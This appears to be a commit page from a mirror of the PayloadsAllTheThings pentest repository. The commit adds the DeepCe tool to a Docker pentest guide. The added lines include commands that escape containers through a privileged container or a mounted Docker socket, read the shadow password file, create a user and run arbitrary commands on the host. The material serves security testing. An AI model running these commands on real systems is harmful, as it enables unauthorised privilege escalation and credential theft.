ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-02-22 06:33:45 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Deepce - Docker Enumeration, Escalation of Privileges and Container Escapes

Browse Source
This commit is contained in:
Swissky 2020-12-06 18:59:43 +01:00
parent 27050f6dd8
commit f48ee0bca5
1 changed files with 8 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
Methodology and Resources/Container - Docker Pentest.md
View File

@ -15,11 +15,18 @@
## Tools ## Tools
* Dockscan : https://github.com/kost/dockscan * [Dockscan](https://github.com/kost/dockscan) : Dockscan is security vulnerability and audit scanner for Docker installations
```powershell ```powershell
dockscan unix:///var/run/docker.sock dockscan unix:///var/run/docker.sock
dockscan -r html -o myreport -v tcp://example.com:5422 dockscan -r html -o myreport -v tcp://example.com:5422
``` ```
* [DeepCe](https://github.com/stealthcopter/deepce) : Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)
```powershell
./deepce.sh
./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce
./deepce.sh --no-enumeration --exploit SOCK --shadow
./deepce.sh --no-enumeration --exploit DOCKER --command "whoami>/tmp/hacked"
```
## Mounted Docker Socket ## Mounted Docker Socket